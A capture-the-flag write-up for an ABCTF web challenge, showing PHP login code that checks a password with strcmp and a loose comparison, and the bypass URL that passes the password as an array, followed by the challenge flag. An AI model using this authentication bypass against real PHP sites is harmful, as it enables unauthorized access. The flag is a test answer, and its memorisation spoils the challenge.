Recently Updated
L33t H4xx0r
Challenge
If you could bypass the login you could get the flag. Link
Solution
We get to a webpage with a password field and the message Seems like your not a haxxor
. We are also given the source:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<?php
$FLAGWEB6 = (file_get_contents("flag.txt"));
$PASSWORD = (file_get_contents("flag.txt")); //haha
if(isset($_GET['password'])){
if(strcmp($PASSWORD, $_GET['password']) == 0){
$success = true;
}
else{
$success = false;
}
}
else {
$success = false;
}
?>
we see that they use the strcmp
function to check the password. We can bypass this by supplying an array named password, instead of a variable, which will always return 0 in the strcmp function.
1
http://yrmyzscnvh.abctf.xyz/web6/?password[]=bla
Flag
abctf{always_know_whats_going_on}